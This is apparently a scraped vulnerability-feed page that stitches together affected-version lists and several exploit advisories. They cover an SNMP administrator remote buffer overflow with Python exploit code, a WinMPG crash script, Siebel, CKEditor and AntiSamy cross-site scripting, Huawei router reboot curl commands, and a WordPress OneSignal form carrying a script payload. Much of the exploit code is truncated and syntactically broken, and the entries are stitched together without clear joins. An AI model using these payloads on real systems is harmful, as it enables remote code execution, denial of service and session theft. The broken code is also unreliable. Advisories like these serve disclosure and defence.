    Hitachi Device Manager Software 6.2 -00 (Solaris(SPARC))
    Hitachi Device Manager Software 6.2 -00 (Solaris (x64))
    Hitachi Device Manager Software 6.2 -00 (Linux)
    Hitachi Device Manager Software 6.1.1 -04 (Windows)
    Hitachi Device Manager Software 6.1.1 -04 (Solaris(x64))
    Hitachi Device Manager Software 6.1.1 -04 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1.1 -04 (Solaris (x64))
    Hitachi Device Manager Software 6.1.1 -04 (Linux)
    Hitachi Device Manager Software 6.1.1 -03 (Windows)
    Hitachi Device Manager Software 6.1.1 -03 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1.1 -03 (Solaris (x64))
    Hitachi Device Manager Software 6.1.1 -03 (Linux)
    Hitachi Device Manager Software 6.1.1 -00 (Windows)
    Hitachi Device Manager Software 6.1.1 -00 (Solaris(x64))
    Hitachi Device Manager Software 6.1.1 -00 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1.1 -00 (Solaris (x64))
    Hitachi Device Manager Software 6.1.1 -00 (Linux)
    Hitachi Device Manager Software 6.1 -03 (Windows)
    Hitachi Device Manager Software 6.1 -03 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1 -03 (Solaris (x64))
    Hitachi Device Manager Software 6.1 -03 (Linux)
    Hitachi Device Manager Software 6.1 -02 (Windows)
    Hitachi Device Manager Software 6.1 -02 (Solaris(x64))
    Hitachi Device Manager Software 6.1 -02 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1 -02 (Solaris (x64))
    Hitachi Device Manager Software 6.1 -02 (Linux)
    Hitachi Device Manager Software 6.1 -00 (Windows)
    Hitachi Device Manager Software 6.1 -00 (Solaris(x64))
    Hitachi Device Manager Software 6.1 -00 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1 -00 (Solaris (x64))
    Hitachi Device Manager Software 6.1 -00 (Linux)
    Hitachi Device Manager Software 6.0 -06 (Windows)
    Hitachi Device Manager Software 6.0 -06 (Solaris(SPARC))
    Hitachi Device Manager Software 6.0 -06 (Solaris (x64))
    Hitachi Device Manager Software 6.0 -06 (Linux)
    Hitachi Device Manager Software 6.0 -00 (Windows)
    Hitachi Device Manager Software 6.0 -00 (Solaris(SPARC))
    Hitachi Device Manager Software 6.0 -00 (Solaris (x64))
    Hitachi Device Manager Software 6.0 -00 (Linux)
    Hitachi Device Manager Software 8.0.0-05 (Windows)
    Hitachi Device Manager Software 8.0.0-05 (Linux(SuSE
    Hitachi Device Manager Software 8.0.0-05 (Linux(RHEL
    Hitachi Device Manager Software 8.0.0-00 (Windows)
    Hitachi Device Manager Software 8.0.0-00 (Linux(SuSE
    Hitachi Device Manager Software 8.0.0-00 (Linux(RHEL
    Hitachi Device Manager Software 7.6.1-05 (Windows)
    Hitachi Device Manager Software 7.6.1-05 (Solaris(x6
    Hitachi Device Manager Software 7.6.1-05 (Solaris(SP
    Hitachi Device Manager Software 7.6.1-05 (Linux(SuSE
    Hitachi Device Manager Software 7.6.1-05 (Linux(RHEL
    Hitachi Device Manager Software 7.5.0-02
    Hitachi Device Manager Software 7.4.0-00 (Solaris(Op
    Hitachi Device Manager Software 7.3.1 (windows)
    Hitachi Device Manager Software 7.2.1-01
    Hitachi Device Manager Software 7.2.1-00
    Hitachi Device Manager Software 7.1.0-00 (Windows)
    Hitachi Device Manager Software 7.1.0-00 (Solaris(SP
    Hitachi Device Manager Software 7.1.0-00 (Linux(SLES
    Hitachi Device Manager Software 7.1.0-00 (Linux(RHEL
    Hitachi Device Manager Software 7.0.1-02 (Windows)
    Hitachi Device Manager Software 7.0.1-02 (linux(SLES
    Hitachi Device Manager Software 7.0.1-02 (linux(RHEL
    Hitachi Device Manager Software 7.0.0-00 (Windows)
    Hitachi Device Manager Software 7.0.0-00 (Solaris(SP
    Hitachi Device Manager Software 7.0.0-00 (linux(SLES
    Hitachi Device Manager Software 7.0.0-00 (linux(RHEL
    Hitachi Device Manager Software 7.0.0-00
    Hitachi Device Manager Software 6.4.0-08 (Windows)
    Hitachi Device Manager Software 6.4.0-08 (Solaris(SP
    Hitachi Device Manager Software 6.4.0-08 (Linux(SLES
    Hitachi Device Manager Software 6.4.0-08 (Linux(RHEL
    Hitachi Device Manager Software 6.4.0-07 (Windows)
    Hitachi Device Manager Software 6.4.0-07 (Solaris(SP
    Hitachi Device Manager Software 6.4.0-07 (linux(SLES
    Hitachi Device Manager Software 6.4.0-07 (linux(RHEL
    Hitachi Device Manager Software 6.3.0-00 (linux(SLES
    F5 BIG-IP WebAccelerator 11.2.0 0
    F5 BIG-IP WebAccelerator 11.3
    F5 BIG-IP WebAccelerator 11.2.1 HF3
    F5 BIG-IP WebAccelerator 11.2.1
    F5 BIG-IP WebAccelerator 11.2 HF3
    F5 BIG-IP WebAccelerator 11.1
    F5 BIG-IP WebAccelerator 11.0
    F5 BIG-IP WebAccelerator 10.2.4
    F5 BIG-IP WebAccelerator 10.2.1
    F5 BIG-IP WebAccelerator 10.0
    F5 BIG-IP WebAccelerator 11.2.1 HF5
    F5 BIG-IP WebAccelerator 11.2.0 HF5
    F5 BIG-IP WebAccelerator 11.1.0 HF7
    F5 BIG-IP WebAccelerator 10.2.1 HF1
    F5 BIG-IP Edge Gateway 11.3
    F5 BIG-IP Edge Gateway 11.2.1 HF3
    F5 BIG-IP Edge Gateway 11.2.1
    F5 BIG-IP Edge Gateway 11.2 HF3
    F5 BIG-IP Edge Gateway 11.2
    F5 BIG-IP Edge Gateway 11.1
    F5 BIG-IP Edge Gateway 11.0
    F5 BIG-IP Edge Gateway 10.2.4
    F5 BIG-IP Edge Gateway 10.2.2
    F5 BIG-IP Edge Gateway 10.2.1
    F5 BIG-IP Edge Gateway 11.2.1 HF5
    F5 BIG-IP Edge Gateway 11.2.1 HF2
    F5 BIG-IP Edge Gateway 11.2.0 HF5
    F5 BIG-IP Edge Gateway 11.1.0 HF7
    F5 BIG-IP Edge Gateway 10.2.1 HF1
    F5 BIG-IP Edge Gateway 10.1
    F5 BIG-IP AAM 11.5.1
    F5 BIG-IP AAM 11.5
    F5 BIG-IP AAM 11.4.1
    F5 BIG-IP AAM 11.4.0
    F5 ARX 6.4
    F5 ARX 6.3
    F5 ARX 6.2
    F5 ARX 6.1.1
    F5 ARX 6.1
    F5 ARX 6.0
    Debian Linux 6.0 sparc
    Debian Linux 6.0 s/390
    Debian Linux 6.0 powerpc
    Debian Linux 6.0 mips
    Debian Linux 6.0 ia-64
    Debian Linux 6.0 ia-32
    Debian Linux 6.0 arm
    Debian Linux 6.0 amd64
    CentOS CentOS 5
    Apache Struts 1.3.10
    Apache Struts 1.3.8
    Apache Struts 1.3.5
    Apache Struts 1.2.9
    Apache Struts 1.2.8
    Apache Struts 1.2.7
    Apache Struts 1.2.4
    Apache Struts 1.1
    Apache Struts 1.0.2
    Apache Struts 1.2.6
    Apache Struts 1.2.2

    Not Vulnerable: VMWare vCenter Server 5.5 Update 2
    NTT DATA Corporation TERASOLUNA Server Framework for Java
    Juniper Security Threat Response Manager 2013.2R8
    Juniper Security Threat Response Manager 2012.1R7
    Juniper Secure Analytics 2014.2R2
    Juniper Secure Analytics 2013.2R8
    Juniper Secure Analytics 2012.1R7
    HP SiteScope 11.24.271
    HP SiteScope 11.13
    Hitachi Tuning Manager Software 8.0.0-06 (Windows)
    Hitachi Tuning Manager Software 8.0.0-06 (Linux(SuSE
    Hitachi Tuning Manager Software 8.0.0-06 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 8.0.0-06 (Windows)
    Hitachi Tiered Storage Manager Software 8.0.0-06 (Linux(SuSE
    Hitachi Tiered Storage Manager Software 8.0.0-06 (Linux(RHEL
    Hitachi Raplication Manager Software 8.0.0-06 (Linux(SuSE
    Hitachi Raplication Manager Software 8.0.0-06 (Linux(RHEL
    Hitachi Global Link Manager Software 8.0.0-01 (Linux(SuSE
    Hitachi Global Link Manager Software 8.0.0-01 (Linux(RHEL
    Hitachi Device Manager Software 8.0.0-06 (Windows)
    Hitachi Device Manager Software 8.0.0-06 (Linux(SuSE
    Hitachi Device Manager Software 8.0.0-06 (Linux(RHEL
    Apache Struts


    Attackers can use readily available tools to exploit this issue.


      OWASP AntiSamy CVE-2017-14735 Cross Site Scripting Vulnerability


      OWASP AntiSamy is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
      An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
      Versions prior to OWASP AntiSamy prior to1.5.7 are vulnerable.


      Bugtraq ID: 105656
      Class: Input Validation Error
      CVE: CVE-2017-14735

      Remote: Yes
      Local: No
      Published: Sep 25 2017 12:00AM
      Updated: Jul 17 2019 07:00AM
      Credit: Raj Veerappan
      Vulnerable: Oracle WebCenter Sites 11.1.1 8.0
      Oracle Retail Returns Management 14.1
      Oracle Retail Returns Management 14.0
      Oracle Retail Returns Management 13.4
      Oracle Retail Returns Management 13.3
      Oracle Retail Central Office 14.1
      Oracle Retail Central Office 14.0
      Oracle Retail Central Office 13.4
      Oracle Retail Central Office 13.3
      Oracle Retail Back Office 14.1
      Oracle Retail Back Office 14.0
      Oracle Retail Back Office 13.4
      Oracle Retail Back Office 13.3
      Oracle Insurance Policy Administration J2EE 10.2
      Oracle Insurance Policy Administration J2EE 10.0
      Oracle Insurance Calculation Engine 9.7
      Oracle Insurance Calculation Engine 10.2
      Oracle Insurance Calculation Engine 10.1
      Oracle Insurance Calculation Engine 10.0
      Oracle Fusion Middleware MapViewer
      Oracle Fusion Middleware MapViewer
      Oracle FLEXCUBE Core Banking 11.8
      Oracle FLEXCUBE Core Banking 11.7
      Oracle FLEXCUBE Core Banking 11.6
      Oracle FLEXCUBE Core Banking 5.2
      Oracle Banking Platform 2.6.1
      Oracle Banking Platform 2.6
      Oracle Banking Platform 2.5.0
      Oracle Agile PLM 9.3.5
      Oracle Agile PLM 9.3.4
      Antisamy Project Antisamy 1.5.6
      Antisamy Project Antisamy 1.5.4
      Antisamy Project Antisamy 1.5.3
      Antisamy Project Antisamy 1.5.1
      Antisamy Project Antisamy 1.4.4

      Not Vulnerable: Antisamy Project Antisamy 1.5.7


      An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

        WinMPG iPod Convert 3.0 Denial Of Service


        WinMPG iPod Convert version 3.0 Register flow denial of service proof of concept exploit.

        MD5 | bee17e5fa15fbe4821c7b222ab4fad83

        # Exploit Title: WinMPG iPod Convert 3.0 - 'Register' Denial of Service
        # Date: 2019-07-16
        # Vendor Homepage:http://www.winmpg.com
        # Software Link: https://www.techspot.com/downloads/downloadnow/6192/?evp=d62142990e9320a4e811b283fdcc4060&file=
        # Exploit Author: stresser
        # Tested Version: 3.0
        # Tested on: Windows XP SP3 EN

        # 1.- Run python code :WinMPG.py
        # 2.- Open EVIL.txt and copy content to clipboard
        # 3.- Open WinMPG and Click 'Register'
        # 4.- Paste the content of EVIL.txt into the Field: 'User Name and User Code'
        # 5.- Click 'Ok'and you will see a crash.

        #!/usr/bin/env python
        buffer = "\x41" * 6000

        print "[+] Creating %s bytes evil payload.." %len(buffer)
        print "[+] File created!"
        print "File cannot be created"

        MAPLE Computer WBT SNMP Administrator Buffer Overflow


        MAPLE Computer WBT SNMP Administrator version suffers from a buffer overflow vulnerability that allows for code execution.

        MD5 | a6d1442ffd46e1f782c5c9c9d20d026e

        [+] Credits: John Page (aka hyp3rlinx)    
        [+] Website: hyp3rlinx.altervista.org
        [+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
        [+] ISR: Apparition Security


        MAPLE Computer WBT SNMP Administrator (Thin Client Administrator)

        SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4

        The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients.
        This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol).
        Agents are built into the clients for remote management and configuration.

        [Vulnerability Type]
        Unauthenticated Remote Buffer Overflow Code Execution 0day

        [CVE Reference]

        [Security Issue]
        SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987.
        This will overwrite data on the stack/registers and allow for control of the programs execution flow resulting in attacker supplied remote code execution.
        Authentication is not required for this exploit.

        This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code.
        When installing the vulnerable program if asks for a serial number just enter a value of "1" or something.
        Upon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin.
        Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp directory, make OS system files viewable in explorer to see them.

        e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp

        ASLR / SEH all set to False helping to make exploit more portable.

        CALL EBX
        10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll)

        Stack dump:

        EAX 41414141
        ECX 0018FEFC
        EDX 0018FF10
        ESP 0018FECC
        EBP 0018FEF4
        ESI 0018FF10
        EDI 0018FEFC
        EIP 41414141
        C 0 ES 002B 32bit 0(FFFFFFFF)
        P 1 CS 0023 32bit 0(FFFFFFFF)
        A 0 SS 002B 32bit 0(FFFFFFFF)
        Z 0 DS 002B 32bit 0(FFFFFFFF)
        S 0 FS 0053 32bit 7EFDD000(FFF)
        T 0 GS 002B 32bit 0(FFFFFFFF)
        D 0
        O 0 LastErr ERROR_NO_SCROLLBARS (000005A7)
        EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)

        from socket import *
        import struct,sys,argparse

        #MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
        #Remote Buffer Overflow 0day
        #hyp3rlinx - ApparitionSec

        #Pop calc.exe Windows 7 SP1

        eip = struct.pack("<L", 0x10008fb3) #JMP EBX
        popebx = struct.pack("<L", 0x022C0012) #5B POP EBX


        def doit(IP,payload):
        s=socket(AF_INET, SOCK_STREAM)
        s.connect((IP, 987))
        print "CVE-2019-13577 - WBT SNMP Administrator Buffer Overflow 0day."
        print "hyp3rlinx"
        except Exception as e:
        print str(e)

        def parse_args():
        parser = argparse.ArgumentParser()
        parser.add_argument("-i", "--ipaddress", help="IP of Target CVE-2019-13577")
        return parser.parse_args()

        def main(args):

        if __name__ == "__main__":
        if not len(sys.argv) > 1:
        print "[*] No args supplied see Help -h"

        [POC Video URL]

        [Network Access]


        [Disclosure Timeline]
        Vendor Notification: July 10, 2019
        Second vendor notification attempt: July 13, 2019
        No vendor replies.
        July 17, 2019 : Public Disclosure

        [+] Disclaimer
        The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
        Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
        that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
        is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
        for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
        or exploits by the author or elsewhere. All content (c).


        Oracle Siebel CRM 19.0 Cross Site Scripting


        Oracle Siebel CRM version 19.0 suffers from a persistent cross site scripting vulnerability.

        MD5 | 4a88161473af34c0bd9555142c5d7a79

        # Exploit Title: Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting
        # Date: 2019-07-17
        # Exploit Author: Sarath Nair aka AceNeon13
        # Contact: @AceNeon13
        # Vendor Homepage: www.oracle.com
        # Software Link: https://www.oracle.com/applications/siebel/
        # Version: Siebel CRM (UI Framework) Version 19.0 and prior
        # CVE: N/A
        # Greetings: Deepu.tv

        # PoC Exploit: Persistent Cross Site Scripting by Insecure File Upload
        Vulnerable URL: http://<Siebel_Application>/finsadm_enu/start.swe?SWECmd=GotoView&SWEView=Activity+Attachment+View

        #Steps to exploit the issue:
        #1. Login to the CRM application and navigate to ‘Activities’ and click on ‘All Activities’.
        #2. Edit one of the existing activity, or create a new one.
        #3. Use the ‘New File’ menu in ‘attachments’ section to upload an HTML file with JavaScript payload (via a proxy tool).
        #4. JavaScript payload will be triggered/rendered upon the victim user views the attached file.

        # Description: The Siebel CRM application allows its users to upload any file types in most of the available file upload functionalities, later on, the uploaded file can be downloaded by another user with the appropriate privileges as part of the workflow. As such, it was possible to upload file with the “html” extension, (containing html and JavaScript code) thereby allowing to also perform Persistent Cross Site Scripting attack.
        # Impact: Cross-Site Scripting attacks do not target the server but rather its users. A hypothetical attacker could use the web server in order to trick other users into unwillingly executing malicious code saved on the server with XSS payload. The impacts of such attack can range from the disclosure of the user’s sensitive information to execution of arbitrary code on the target user’s system.
        # Solution: Apply the Oracle Siebel CRM patch released on 16 July 2019

        # Vulnerability Disclosure Timeline:
        2017-December-23: Discovered vulnerability
        2017-December-25: Vendor Notification
        2017-December-27: Vendor Response/Feedback
        2019-July-16: Vendor Fix/Patch
        2019-July-17: Public Disclosure

        Warm regards,
        Sarath Nair

        CKEditor CVE-2018-9861 Cross Site Scripting Vulnerability


        CKEditor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
        Note: This issue was previously titled 'Drupal CKEditor Plugin Cross Site Scripting Vulnerability'. The title have been changed to better reflect the vulnerability information.
        An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
        CKEditor version 4.5.10 through 4.9.1 are vulnerable; other versions may also be affected.


        Bugtraq ID: 103924
        Class: Input Validation Error
        CVE: CVE-2018-9861

        Remote: Yes
        Local: No
        Published: Apr 17 2018 12:00AM
        Updated: Jul 18 2019 11:00AM
        Credit: Kyaw Min Thein.
        Vulnerable: Oracle PeopleSoft Enterprise PeopleTools 8.57
        Oracle PeopleSoft Enterprise PeopleTools 8.56
        Oracle PeopleSoft Enterprise PeopleTools 8.55
        Drupal Drupal 8.5.1
        Drupal Drupal 8.5
        Drupal Drupal 8.4.6
        Drupal Drupal 8.4.5
        Drupal Drupal 8.4.4
        Drupal Drupal 8.4.3
        Drupal Drupal 8.4.2
        Drupal Drupal 8.4.1
        Drupal Drupal 8.4
        Drupal Drupal 8.3.9
        Drupal Drupal 8.3.8
        Drupal Drupal 8.3.7
        Drupal Drupal 8.3.6
        Drupal Drupal 8.3.5
        Drupal Drupal 8.3.4
        Drupal Drupal 8.3.3
        Drupal Drupal 8.3.2
        Drupal Drupal 8.3.1
        Drupal Drupal 8.2.8
        Drupal Drupal 8.2.7
        Drupal Drupal 8.2.3
        Drupal Drupal 8.2.2
        Drupal Drupal 8.2.1
        Drupal Drupal 8.2
        Drupal Drupal 8.1.10
        Drupal Drupal 8.1.9
        Drupal Drupal 8.1.8
        Drupal Drupal 8.0.4
        Drupal Drupal 8.0.3
        Drupal Drupal 8.0.2
        Drupal Drupal 8.0.1
        Drupal Drupal 8.1.7
        Drupal Drupal 8.1.6
        Drupal Drupal 8.1.5
        Drupal Drupal 8.1.4
        Drupal Drupal 8.1.3
        Drupal Drupal 8.1.0
        Drupal Drupal 8.0
        Ckeditor Ckeditor 4.9.1
        Ckeditor Ckeditor 4.9
        Ckeditor Ckeditor 4.8
        Ckeditor Ckeditor 4.7.3
        Ckeditor Ckeditor 4.7.2
        Ckeditor Ckeditor 4.7.1
        Ckeditor Ckeditor 4.7
        Ckeditor Ckeditor 4.6.2
        Ckeditor Ckeditor 4.6.1
        Ckeditor Ckeditor 4.6
        Ckeditor Ckeditor 4.5.11
        Ckeditor Ckeditor 4.5.10

        Not Vulnerable: Drupal Drupal 8.5.2
        Drupal Drupal 8.4.7
        Ckeditor Ckeditor 4.9.2


        Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

          Huawei HG530 Reboot / Restore Authentication Bypass


          Huawei HG530 suffers from unauthenticated remote reboot and restore vulnerabilities.

          MD5 | 960066e7bdcc835fbc6e47444eb6a973

          Huawei HG530 Multiple Unauthenticated reboot and restore Vulnerability


          The Huawei HG530 suffers from multiple Unauthenticated reboot and restore
          vulnerability allows local attackers to reboot the device or to restore to
          factory Configuration without user interaction.


          The vulnerability is located in form POST data parameter in
          'Restart_factory' via path '/Forms/bottom_restart_1'


          Security issue PoC :

          1-Rebooting :

          curl -vv -X POST --path-as-is -d '

          2-Restoring :

          curl -vv -X POST --path-as-is -d '


          WordPress OneSignal 1.17.5 Cross Site Scripting


          WordPress OneSignal plugin version 1.17.5 suffers from a persistent cross site scripting vulnerability.

          MD5 | 19cd11fce2ebe3bf42676b53160a66cb


          WordPress Plugin OneSignal 1.17.5 Persistent Cross-Site Scripting

          Vendor: OneSignal
          Product web page: https://www.onesignal.com
          Affected version: 1.17.5

          Summary: OneSignal is a high volume and reliable push notification service
          for websites and mobile applications. We support all major native and mobile
          platforms by providing dedicated SDKs for each platform, a RESTful server API,
          and an online dashboard for marketers to design and send push notifications.

          Desc: The application suffers from an authenticated stored XSS via POST request.
          The issue is triggered when input passed via the POST parameter 'subdomain' is
          not properly sanitized before being returned to the user. This can be exploited
          to execute arbitrary HTML and script code in a user's browser session in context
          of an affected site.

          Tested on: WordPress 5.2.2

          Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

          Advisory ID: ZSL-2019-5530
          Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5530.php



          <script>history.pushState('', 'SHPA', '/')</script>
          <form action="" method="POST">
          <input type="hidden" name="onesignal_config_page_nonce" value="f7fae30a4f" />
          <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=onesignal-push" />
          <input type="hidden" name="app_id" value="14d99ab2-fc9d-1337-bc16-a8a6df479515" />
          <input type="hidden" name="app_rest_api_key" value="M2IzZDA4MzItOGJmOS00YjRkLWE4YzEtZSLmMjllNjlkYmZl" />
          <input type="hidden" name="subdomain" value=""><script>confirm(251)</script>" />
          <input type="hidden" name="safari_web_id" value="" />
          <input type="hidden" name="showNotificationIconFromPostThumbnail" value="true" />
          <input type="hidden" name="showNotificationImageFromPostThumbnail" value="true" />
          <input type="hidden" name="persist_notifications" value="platform-default" />
          <input type="hidden" name="notification_title" value="hACKME" />
          <input type="hidden" name="notifyButton_enable" value="true" />
          <input type="hidden" name="notifyButton_showAfterSubscribed" value="true" />
          <input type="hidden" name="notifyButton_prenotify" value="true" />
          <input type="hidden" name="notifyButton_showcredit" value="true" />
          <input type="hidden" name="notifyButton_customize_enable" value="true" />
          <input type="hidden" name="notifyButton_size" value="medium" />
          <input type="hidden" name="notifyButton_position" value="bottom-right" />
          <input type="hidden" name="notifyButton_theme" value="default" />
          <input type="hidden" name="notifyButton_offset_bottom" value="" />
          <input type="hidden" name="notifyButton_offset_left" value="" />
          <input type="hidden" name="notifyButton_offset_right" value="" />
          <input type="hidden" name="notifyButton_color_background" value="" />
          <input type="hidden" name="notifyButton_color_foreground" value="" />
          <input type="hidden" name="notifyButton_color_badge_background" value="" />
          <input type="hidden" name="notifyButton_color_badge_foreground" value="" />
          <input type="hidden" name="notifyButton_color_badge_border" value="" />
          <input type="hidden" name="notifyButton_color_pulse" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_background" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_background_hover" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_background_active" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_color" value="" />
          <input type="hidden" name="notifyButton_message_prenotify" value="" />
          <input type="hidden" name="notifyButton_tip_state_unsubscribed" value="" />
          <input type="hidden" name="notifyButton_tip_state_subscribed" value="" />
          <input type="hidden" name="notifyButton_tip_state_blocked" value="" />
          <input type="hidden" name="notifyButton_message_action_subscribed" value="" />
          <input type="hidden" name="notifyButton_message_action_resubscribed" value="" />
          <input type="hidden" name="notifyButton_message_action_unsubscribed" value="" />
          <input type="hidden" name="notifyButton_dialog_main_title" value="" />
          <input type="hidden" name="notifyButton_dialog_main_button_subscribe" value="" />
          <input type="hidden" name="notifyButton_dialog_main_button_unsubscribe" value="" />
          <input type="hidden" name="notifyButton_dialog_blocked_title" value="" />
          <input type="hidden" name="notifyButton_dialog_blocked_message" value="" />
          <input type="hidden" name="prompt_customize_enable" value="true" />
          <input type="hidden" name="prompt_action_message" value="" />
          <input type="hidden" name="prompt_auto_accept_title" value="" />
          <input type="hidden" name="prompt_site_name" value="" />
          <input type="hidden" name="prompt_example_notification_title_desktop" value="" />
          <input type="hidden" name="prompt_example_notification_message_desktop" value="" />
          <input type="hidden" name="prompt_example_notification_title_mobile" value="" />
          <input type="hidden" name="prompt_example_notification_message_mobile" value="" />
          <input type="hidden" name="prompt_example_notification_caption" value="" />
          <input type="hidden" name="prompt_accept_button_text" value="" />
          <input type="hidden" name="prompt_cancel_button_text" value="" />
          <input type="hidden" name="send_welcome_notification" value="true" />
          <input type="hidden" name="welcome_notification_title" value="" />
          <input type="hidden" name="welcome_notification_message" value="" />
          <input type="hidden" name="welcome_notification_url" value="" />
          <input type="hidden" name="notification_on_post" value="true" />
          <input type="hidden" name="utm_additional_url_params" value="" />
          <input type="hidden" name="allowed_custom_post_types" value="" />
          <input type="hidden" name="custom_manifest_url" value="" />
          <input type="hidden" name="show_notification_send_status_message" value="true" />
          <input type="submit" value="Send" />

          Microsoft Windows RPCSS Activation Kernel Security Callback Privilege Escalation


          On Microsoft Windows, the RPCSS Activation Kernel RPC server's security callback can be bypassed resulting in elevation of privilege.

          MD5 | c4819f99e884719a97eddb52654d624b

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